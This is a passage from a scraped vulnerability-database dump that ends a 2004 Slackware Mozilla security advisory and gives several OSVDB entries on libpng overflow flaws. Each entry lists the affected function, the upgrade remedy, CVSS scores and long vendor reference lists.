-current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-1.7.2-i486-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-plugins-1.7.2-noarch-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/gnome/epiphany-1.2.7-i486-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/gnome/galeon-1.3.17-i486-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/gaim-0.81-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 9.1 packages:\n29515193166b9b618be405a71b5e9a59 mozilla-1.4.3-i486-1.tgz\n49d537be814de72a3d62a5cc9f6e3b15 mozilla-plugins-1.4.3-noarch-1.tgz\n\nSlackware 10.0 packages:\n612a65758f03fe08a44e004b1ae92d70 mozilla-1.7.2-i486-1.tgz\n55da20d3c7acdd50a3b4abfe12191069 mozilla-plugins-1.7.2-noarch-1.tgz\n86034039fbf6b52584e05701a0598ca4 epiphany-1.2.7-i486-1.tgz\nc3f238fdba8684948d8817d7cf0db567 gaim-0.81-i486-1.tgz\n0e8393b8f1b992dc7804fe925a839755 galeon-1.3.17-i486-1.tgz\n\nSlackware -current packages:\n612a65758f03fe08a44e004b1ae92d70 mozilla-1.7.2-i486-1.tgz\n55da20d3c7acdd50a3b4abfe12191069 mozilla-plugins-1.7.2-noarch-1.tgz\n86034039fbf6b52584e05701a0598ca4 epiphany-1.2.7-i486-1.tgz\n0e8393b8f1b992dc7804fe925a839755 galeon-1.3.17-i486-1.tgz\nddb7281b985c6b7efb20afc69e5c2ffb gaim-0.81-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg mozilla-1.7.2-i486-1.tgz \\\n mozilla-plugins-1.7.2-noarch-1.tgz \\\n epiphany-1.2.7-i486-1.tgz \\\n gaim-0.81-i486-1.tgz \\\n galeon-1.3.17-i486-1.tgz", "modified": "2004-08-10T21:17:12", "published": "2004-08-10T21:17:12", "id": "SSA-2004-223-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.667659", "type": "slackware", "title": "[slackware-security] Mozilla", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "edition": 1, "description": "## Vulnerability Description\nA local overflow exists in libpng. The library function png_handle_iCCP fails to validate the input length from PNG files resulting in a possible NULL-pointer being referenced. With a specially crafted request, an attacker can cause denial of service which might result in a loss of availability for the application.\n## Solution Description\nUpgrade to version 1.2.6 release candidate 1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. Users of the older 1.0 series should upgrade to libpng-1.0.16 release candidate 1 or higher.\n## Short Description\nA local overflow exists in libpng. The library function png_handle_iCCP fails to validate the input length from PNG files resulting in a possible NULL-pointer being referenced. With a specially crafted request, an attacker can cause denial of service which might result in a loss of availability for the application.\n## References:\nVendor URL: http://www.imagemagick.org/\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=61798)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:213)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.49/SCOSA-2005.49.txt)\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/2004_23_libpng.html)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:079)\n[Vendor Specific Advisory URL](http://www.redhat.com/archives/fedora-announce-list/2004-August/msg00006.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000564)\n[Vendor Specific Advisory URL](http://bugzilla.mozilla.org/show_bug.cgi?id=251381)\n[Vendor Specific Advisory URL](http://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00139.html)\n[Vendor Specific Advisory URL](http://www.redhat.com/archives/fedora-announce-list/2004-August/msg00005.html)\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200408-03.xml)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:212)\nUS-CERT Cyber Security Alert: TA04-217A\nSecurity Tracker: 1010854\n[Secunia Advisory ID:12222](https://secuniaresearch.flexerasoftware.com/advisories/12222/)\n[Secunia Advisory ID:12810](https://secuniaresearch.flexerasoftware.com/advisories/12810/)\n[Secunia Advisory ID:13341](https://secuniaresearch.flexerasoftware.com/advisories/13341/)\n[Secunia Advisory ID:22958](https://secuniaresearch.flexerasoftware.com/advisories/22958/)\n[Secunia Advisory ID:12221](https://secuniaresearch.flexerasoftware.com/advisories/12221/)\n[Secunia Advisory ID:12219](https://secuniaresearch.flexerasoftware.com/advisories/12219/)\n[Secunia Advisory ID:12223](https://secuniaresearch.flexerasoftware.com/advisories/12223/)\n[Secunia Advisory ID:12232](https://secuniaresearch.flexerasoftware.com/advisories/12232/)\n[Secunia Advisory ID:12240](https://secuniaresearch.flexerasoftware.com/advisories/12240/)\n[Secunia Advisory ID:12248](https://secuniaresearch.flexerasoftware.com/advisories/12248/)\n[Secunia Advisory ID:15432](https://secuniaresearch.flexerasoftware.com/advisories/15432/)\n[Secunia Advisory ID:17645](https://secuniaresearch.flexerasoftware.com/advisories/17645/)\n[Secunia Advisory ID:22957](https://secuniaresearch.flexerasoftware.com/advisories/22957/)\n[Secunia Advisory ID:12220](https://secuniaresearch.flexerasoftware.com/advisories/12220/)\n[Secunia Advisory ID:12234](https://secuniaresearch.flexerasoftware.com/advisories/12234/)\n[Secunia Advisory ID:12249](https://secuniaresearch.flexerasoftware.com/advisories/12249/)\n[Secunia Advisory ID:12283](https://secuniaresearch.flexerasoftware.com/advisories/12283/)\n[Secunia Advisory ID:12354](https://secuniaresearch.flexerasoftware.com/advisories/12354/)\n[Secunia Advisory ID:13291](https://secuniaresearch.flexerasoftware.com/advisories/13291/)\n[Related OSVDB ID: 8326](https://vulners.com/osvdb/OSVDB:8326)\n[Related OSVDB ID: 8312](https://vulners.com/osvdb/OSVDB:8312)\n[Related OSVDB ID: 8314](https://vulners.com/osvdb/OSVDB:8314)\n[Related OSVDB ID: 8315](https://vulners.com/osvdb/OSVDB:8315)\n[Related OSVDB ID: 8316](https://vulners.com/osvdb/OSVDB:8316)\nRedHat RHSA: RHSA-2004:402-08\nRedHat RHSA: RHSA-2004:421-17\nOther Advisory URL: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:082\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200408-22.xml\nOther Advisory URL: http://www4.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBTU01063\nOther Advisory URL: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57617\nOther Advisory URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-57683-1\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.25/SCOSA-2005.25.txt\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2004.16/SCOSA-2004.16.txt\nMicrosoft Security Bulletin: MS05-009\nMicrosoft Knowledge Base Article: 890261\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-08/0026.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-02/0034.html\nKeyword: SCOSA-2005.49\nISS X-Force ID: 10925\nISS X-Force ID: 19252\n[CVE-2004-0597](https://vulners.com/cve/CVE-2004-0597)\n[CVE-2004-0598](https://vulners.com/cve/CVE-2004-0598)\n[CVE-2004-0599](https://vulners.com/cve/CVE-2004-0599)\nCIAC Advisory: o-192\nCERT VU: 236656\n", "modified": "2004-08-04T00:00:00", "published": "2004-08-04T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:8313", "id": "OSVDB:8313", "type": "osvdb", "title": "libpng png_handle_iCCP() NULL Pointer Dereference DoS", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "cvelist": ["CVE-2004-0599"], "edition": 1, "description": "## Vulnerability Description\nA local overflow exists in libpng. The library function png_handle_sPLT fails to validate input resulting in a possible integer overflow. With a specially crafted request, an attacker might theoretically cause execution of code resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 1.2.6 release candidate 1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. Users of the older 1.0 series should upgrade to libpng-1.0.16 release candidate 1 or higher.\n## Short Description\nA local overflow exists in libpng. The library function png_handle_sPLT fails to validate input resulting in a possible integer overflow. With a specially crafted request, an attacker might theoretically cause execution of code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.imagemagick.org/\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=61798)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:213)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.49/SCOSA-2005.49.txt)\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/2004_23_libpng.html)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:079)\n[Vendor Specific Advisory URL](http://www.redhat.com/archives/fedora-announce-list/2004-August/msg00006.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000564)\n[Vendor Specific Advisory URL](http://bugzilla.mozilla.org/show_bug.cgi?id=251381)\n[Vendor Specific Advisory URL](http://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00139.html)\n[Vendor Specific Advisory URL](http://www.redhat.com/archives/fedora-announce-list/2004-August/msg00005.html)\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200408-03.xml)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:212)\nUS-CERT Cyber Security Alert: TA04-217A\nSecurity Tracker: 1010854\n[Secunia Advisory ID:12222](https://secuniaresearch.flexerasoftware.com/advisories/12222/)\n[Secunia Advisory ID:12810](https://secuniaresearch.flexerasoftware.com/advisories/12810/)\n[Secunia Advisory ID:13341](https://secuniaresearch.flexerasoftware.com/advisories/13341/)\n[Secunia Advisory ID:22958](https://secuniaresearch.flexerasoftware.com/advisories/22958/)\n[Secunia Advisory ID:12221](https://secuniaresearch.flexerasoftware.com/advisories/12221/)\n[Secunia Advisory ID:12219](https://secuniaresearch.flexerasoftware.com/advisories/12219/)\n[Secunia Advisory ID:12223](https://secuniaresearch.flexerasoftware.com/advisories/12223/)\n[Secunia Advisory ID:12232](https://secuniaresearch.flexerasoftware.com/advisories/12232/)\n[Secunia Advisory ID:12240](https://secuniaresearch.flexerasoftware.com/advisories/12240/)\n[Secunia Advisory ID:12248](https://secuniaresearch.flexerasoftware.com/advisories/12248/)\n[Secunia Advisory ID:15432](https://secuniaresearch.flexerasoftware.com/advisories/15432/)\n[Secunia Advisory ID:17645](https://secuniaresearch.flexerasoftware.com/advisories/17645/)\n[Secunia Advisory ID:22957](https://secuniaresearch.flexerasoftware.com/advisories/22957/)\n[Secunia Advisory ID:12220](https://secuniaresearch.flexerasoftware.com/advisories/12220/)\n[Secunia Advisory ID:12234](https://secuniaresearch.flexerasoftware.com/advisories/12234/)\n[Secunia Advisory ID:12249](https://secuniaresearch.flexerasoftware.com/advisories/12249/)\n[Secunia Advisory ID:12283](https://secuniaresearch.flexerasoftware.com/advisories/12283/)\n[Secunia Advisory ID:12354](https://secuniaresearch.flexerasoftware.com/advisories/12354/)\n[Secunia Advisory ID:13291](https://secuniaresearch.flexerasoftware.com/advisories/13291/)\n[Related OSVDB ID: 8313](https://vulners.com/osvdb/OSVDB:8313)\n[Related OSVDB ID: 8326](https://vulners.com/osvdb/OSVDB:8326)\n[Related OSVDB ID: 8312](https://vulners.com/osvdb/OSVDB:8312)\n[Related OSVDB ID: 8315](https://vulners.com/osvdb/OSVDB:8315)\n[Related OSVDB ID: 8316](https://vulners.com/osvdb/OSVDB:8316)\nRedHat RHSA: RHSA-2004:402-08\nRedHat RHSA: RHSA-2004:421-17\nOther Advisory URL: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:082\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200408-22.xml\nOther Advisory URL: http://www4.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBTU01063\nOther Advisory URL: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57617\nOther Advisory URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-57683-1\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.25/SCOSA-2005.25.txt\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2004.16/SCOSA-2004.16.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-08/0026.html\nKeyword: SCOSA-2005.49\nISS X-Force ID: 10925\n[CVE-2004-0599](https://vulners.com/cve/CVE-2004-0599)\nCIAC Advisory: o-192\nCERT VU: 477512\nCERT VU: 160448\nCERT VU: 286464\n", "modified": "2004-08-04T00:00:00", "published": "2004-08-04T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:8314", "id": "OSVDB:8314", "type": "osvdb", "title": "libpng png_handle_sPLT Local Overflow", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "cvelist": ["CVE-2004-0599"], "edition": 1, "description": "## Vulnerability Description\nA potential local integer overflow exists in libpng. The library function png_push_read_chunk contains code that might be susceptible to integer overflows. It is currently unknown how dangerous this code might be. With a specially crafted request, an attacker might cause crashes or execution of code resulting in a loss of availability.\n## Technical Description\nAccording to the vulnerability discoverer, the severity of issue is unknown. Might be difficult to exploit, if at all.\n## Solution Description\nUpgrade to version 1.2.6 release candidate 1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. Users of the older 1.0 series should upgrade to libpng-1.0.16 release candidate 1 or higher.\n## Short Description\nA potential local integer overflow exists in libpng. The library function png_push_read_chunk contains code that might be susceptible to integer overflows. It is currently unknown how dangerous this code might be. With a specially crafted request, an attacker might cause crashes or execution of code resulting in a loss of availability.\n## References:\nVendor URL: http://www.imagemagick.org/\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=61798)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:213)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.49/SCOSA-2005.49.txt)\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/2004_23_libpng.html)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:079)\n[Vendor Specific Advisory URL](http://www.redhat.com/archives/fedora-announce-list/2004-August/msg00006.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000564)\n[Vendor Specific Advisory URL](http://bugzilla.mozilla.org/show_bug.cgi?id=251381)\n[Vendor Specific Advisory URL](http://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00139.html)\n[Vendor Specific Advisory URL](http://www.redhat.com/archives/fedora-announce-list/2004-August/msg00005.html)\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200408-03.xml)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:212)\nUS-CERT Cyber Security Alert: TA04-217A\nSecurity Tracker: 1010854\n[Secunia Advisory ID:12222](https://secuniaresearch.flexerasoftware.com/advisories/12222/)\n[Secunia Advisory ID:12810](https://secuniaresearch.flexerasoftware.com/advisories/12810/)\n[Secunia Advisory ID:13341](https://secuniaresearch.flexerasoftware.com/advisories/13341/)\n[Secunia Advisory ID:22958](https://secuniaresearch.flexerasoftware.com/advisories/22958/)\n[Secunia Advisory ID:12221](https://secuniaresearch.flexerasoftware.com/advisories/12221/)\n[Secunia Advisory ID:12219](https://secuniaresearch.flexerasoftware.com/advisories/12219/)\n[Secunia Advisory ID:12223](https://secuniaresearch.flexerasoftware.com/advisories/12223/)\n[Secunia Advisory ID:12232](https://secuniaresearch.flexerasoftware.com/advisories/12232/)\n[Secunia Advisory ID:12240](https://secuniaresearch.flexerasoftware.com/advisories/12240/)\n[Secunia Advisory ID:12248](https://secuniaresearch.flexerasoftware.com/advisories/12248/)\n[Secunia Advisory ID:15432](https://secuniaresearch.flexerasoftware.com/advisories/15432/)\n[Secunia Advisory ID:17645](https://secuniaresearch.flexerasoftware.com/advisories/17645/)\n[Secunia Advisory ID:22957](https://secuniaresearch.flexerasoftware.com/advisories/22957/)\n[Secunia Advisory ID:12220](https://secuniaresearch.flexerasoftware.com/advisories/12220/)\n[Secunia Advisory ID:12234](https://secuniaresearch.flexerasoftware.com/advisories/12234/)\n[Secunia Advisory ID:12249](https://secuniaresearch.flexerasoftware.com/advisories/12249/)\n[Secunia Advisory ID:12283](https://secuniaresearch.flexerasoftware.com/advisories/12283/)\n[Secunia Advisory ID:12354](https://secuniaresearch.flexerasoftware.com/advisories/12354/)\n[Secunia Advisory ID:13291](https://secuniaresearch.flexerasoftware.com/advisories/13291/)\n[Related OSVDB ID: 8313](https://vulners.com/osvdb/OSVDB:8313)\n[Related OSVDB ID: 8326](https://vulners.com/osvdb/OSVDB:8326)\n[Related OSVDB ID: 8312](https://vulners.com/osvdb/OSVDB:8312)\n[Related OSVDB ID: 8314](https://vulners.com/osvdb/OSVDB:8314)\n[Related OSVDB ID: 8315](https://vulners.com/osvdb/OSVDB:8315)\nRedHat RHSA: RHSA-2004:402-08\nRedHat RHSA: RHSA-2004:421-17\nOther Advisory URL: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:082\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200408-22.xml\nOther Advisory URL: http://scary.beasts.org/security/CESA-2004-001.txt\nOther Advisory URL: http://www4.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBTU01063\nOther Advisory URL: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57617\nOther Advisory URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-57683-1\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.25/SCOSA-2005.25.txt\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2004.16/SCOSA-2004.16.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-08/0026.html\nKeyword: SCOSA-2005.49\nISS X-Force ID: 10925\n[CVE-2004-0599](https://vulners.com/cve/CVE-2004-0599)\nCIAC Advisory: o-192\nCERT VU: 477512\nCERT VU: 160448\nCERT VU: 286464\n", "modified": "2004-08-04T00:00:00", "published": "2004-08-04T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:8316", "id": "OSVDB:8316", "type": "osvdb", "title": "libpng Progressive Display Image Reading Overflow", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "cvelist": ["CVE-2004-0599"], "edition": 1, "description": "## Vulnerability Description\nA local overflow exists in libpng. The library function png_read_png fails to validate the height of input PNG files resulting in a possible integer overflow. With a specially crafted request, an attacker might cause a crash of the applicatioin resulting in a loss of availability.\n## Solution Description\nUpgrade to version 1.2.6 release candidate 1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. Users of the older 1.0 series should upgrade to libpng-1.0.16 release candidate 1 or higher.\n## Short Description\nA local overflow exists in libpng. The library function png_read_png fails to validate the height of input PNG files resulting in a possible integer overflow. With a specially crafted request, an attacker might cause a crash of the applicatioin resulting in a loss of availability.\n## References:\nVendor URL: http://www.imagemagick.org/\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=61798)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:213)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.49/SCOSA-2005.49.txt)\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/2004_23_libpng.html)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:079)\n[Vendor Specific Advisory URL](http://www.redhat.com/archives/fedora-announce-list/2004-August/msg00006.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000564)\n[Vendor Specific Advisory URL](http://bugzilla.mozilla.org/show_bug.cgi?id=251381)\n[Vendor Specific Advisory URL](http://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00139.html)\n[Vendor Specific Advisory URL](http://www.redhat.com/archives/fedora-announce-list/2004-August/msg00005.html)\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200408-03.xml)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:212)\nUS-CERT Cyber Security Alert: TA04-217A\nSecurity Tracker: 1010854\n[Secunia Advisory ID:12222](https://secuniaresearch.flexerasoftware.com/advisories/12222/)\n[Secunia Advisory ID:12810](https://secuniaresearch.flexerasoftware.com/advisories/12810/)\n[Secunia Advisory ID:13341](https://secuniaresearch.flexerasoftware.com/advisories/13341/)\n[Secunia Advisory ID:22958](https://secuniaresearch.flexerasoftware.com/advisories/22958/)\n[Secunia Advisory ID:12221](https://secuniaresearch.flexerasoftware.com/advisories/12221/)\n[Secunia Advisory ID:12219](https://secuniaresearch.flexerasoftware.com/advisories/12219/)\n[Secunia Advisory ID:12223](https://secuniaresearch.flexerasoftware.com/advisories/12223/)\n[Secunia Advisory ID:12232](https://secuniaresearch.flexerasoftware.com/advisories/12232/)\n[Secunia Advisory ID:12240](https://secuniaresearch.flexerasoftware.com/advisories/12240/)\n[Secunia Advisory ID:12248](https://secuniaresearch.flexerasoftware.com/advisories/12248/)\n[Secunia Advisory ID:15432](https://secuniaresearch.flexerasoftware.com/advisories/15432/)\n[Secunia Advisory ID:17645](https://secuniaresearch.flexerasoftware.com/advisories/17645/)\n[Secunia Advisory ID:22957](https://secuniaresearch.flexerasoftware.com/advisories/22957/)\n[Secunia Advisory ID:12220](https://secuniaresearch.flexerasoftware.com/advisories/12220/)\n[Secunia Advisory ID:12234](https://secuniaresearch.flexerasoftware.com/advisories/12234/)\n[Secunia Advisory ID:12249](https://secuniaresearch.flexerasoftware.com/advisories/12249/)\n[Secunia Advisory ID:12283](https://secuniaresearch.flexerasoftware.com/advisories/12283/)\n[Secunia Advisory ID:12354](https://secuniaresearch.flexerasoftware.com/advisories/12354/)\n[Secunia Advisory ID:13291](https://secuniaresearch.flexerasoftware.com/advisories/13291/)\n[Related OSVDB ID: 8313](https://vulners.com/osvdb/OSVDB:8313)\n[Related OSVDB ID: 8326](https://vulners.com/osvdb/OSVDB:8326)\n[Related OSVDB ID: 8312](https://vulners.com/osvdb/OSVDB:8312)\n[Related OSVDB ID: 8314](https://vulners.com/osvdb/OSVDB:8314)\n[Related OSVDB ID: 8316](https://vulners.com/osvdb/OSVDB:8316)\nRedHat RHSA: RHSA-2004:402-08\nRedHat RHSA: RHSA-2004:421-17\nOther Advisory URL: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:082\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200408-22.xml\nOther Advisory URL: http://www4.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBTU01063\nOther Advisory URL: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57617\nOther Advisory URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-57683-1\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.25/SCOSA-2005.25.txt\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2004.16/SCOSA-2004.16.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-08/0026.html\nKeyword: SCOSA-2005.49\nISS X-Force ID: 10925\n[CVE-2004-0599](https://vulners.com/cve/CVE-2004-0599)\nCIAC Advisory: o-192\nCERT VU: 477512\nCERT VU: 388984\nCERT VU: 160448\n", "modified": "2004-08-04T00:00:00", "published": "2004-08-04T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:8315", "id": "OSVDB:8315", "type": "osvdb", "title": "libpng png_read_png Integer Overflow", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "cvelist": ["CVE-2004-0597"], "edition": 1, "description": "## Vulnerability Description\nA local overflow exists in libpng. The library function png_handle_sBIT relies on checks in other functions to perform input validation resulting in a possible buffer overflow. With a specially crafted PNG file, an attacker might cause execution of code resulting in a loss of integrity.\n## Technical Description\nAccording to the vulnerability discoverer, this issue is extremely difficult to exploit, if at all.\n## Solution Description\nUpgrade to version 1.2.6 release candidate 1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. Users of the older 1.0 series should upgrade to libpng-1.0.16 release candidate 1 or higher.\n## Short Description\nA local overflow exists in libpng. The library function png_handle_sBIT relies on checks in other functions to perform input validation resulting in a possible buffer overflow. With a specially crafted PNG file, an attacker might cause execution of code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.imagemagick.org/\nVendor URL: http://www.libpng.org/pub/png/libpng.html\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=61798)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:213)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.49/SCOSA-2005.49.txt)\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/2004_23_libpng.html)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:079)\n[Vendor Specific Advisory URL](http://www.redhat.com/archives/fedora-announce-list/2004-August/msg00006.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000564)\n[Vendor Specific Advisory URL](http://bugzilla.mozilla.org/show_bug.cgi?id=251381)\n[Vendor Specific Advisory URL](http://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00139.html)\n[Vendor Specific Advisory URL](http://www.redhat.com/archives/fedora-announce-list/2004-August/msg00005.html)\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200408-03.xml)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:212)\nUS-CERT Cyber Security Alert: TA04-217A\nSecurity Tracker: 1010854\n[Secunia Advisory ID:12222](https://secuniaresearch.flexerasoftware.com/advisories/12222/)\n[Secunia Advisory ID:12810](https://secuniaresearch.flexerasoftware.com/advisories/12810/)\n[Secunia Advisory ID:13341](https://secuniaresearch.flexerasoftware.com/advisories/13341/)\n[Secunia Advisory ID:22958](https://secuniaresearch.flexerasoftware.com/advisories/22958/)\n[Secunia Advisory ID:12221](https://secuniaresearch.flexerasoftware.com/advisories/12221/)\n[Secunia Advisory ID:12219](https://secuniaresearch.flexerasoftware.com/advisories/12219/)\n[Secunia Advisory ID:12223](https://secuniaresearch.flexerasoftware.com/advisories/12223/)\n[Secunia Advisory ID:12232](https://secuniaresearch.flexerasoftware.com/advisories/12232/)\n[Secunia Advisory ID:12240](https://secuniaresearch.flexerasoftware.com/advisories/12240/)\n[Secunia Advisory ID:12248](https://secuniaresearch.flexerasoftware.com/advisories/12248/)\n[Secunia Advisory ID:15432](https://secuniaresearch.flexerasoftware.com/advisories/15432/)\n[Secunia Advisory ID:17645](https://secuniaresearch.flexerasoftware.com/advisories/17645/)\n[Secunia Advisory ID:22957](https://secuniaresearch.flexerasoftware.com/advisories/22957/)\n[Secunia Advisory ID:12220](https://secuniaresearch.flexerasoftware.com/advisories/12220/)\n[Secunia Advisory ID:12234](https://secuniaresearch.flexerasoftware.com/advisories/12234/)\n[Secunia Advisory ID:12249](https://secuniaresearch.flexerasoftware.com/advisories/12249/)\n[Secunia Advisory ID:12283](https://secuniaresearch.flexerasoftware.com/advisories/12283/)\n[Secunia Advisory ID:12354](https://secuniaresearch.flexerasoftware.com/advisories/12354/)\n[Secunia Advisory ID:13291](https://secuniaresearch.flexerasoftware.com/advisories/13291/)\n[Related OSVDB ID: 8313](https://vulners.com/osvdb/OSVDB:8313)\n[Related OSVDB ID: 8326](https://vulners.com/osvdb/OSVDB:8326)\n[Related OSVDB ID: 8314](https://vulners.com/osvdb/OSVDB:8314)\n[Related OSVDB ID: 8315](https://vulners.com/osvdb/OSVDB:8315)\n[Related OSVDB ID: 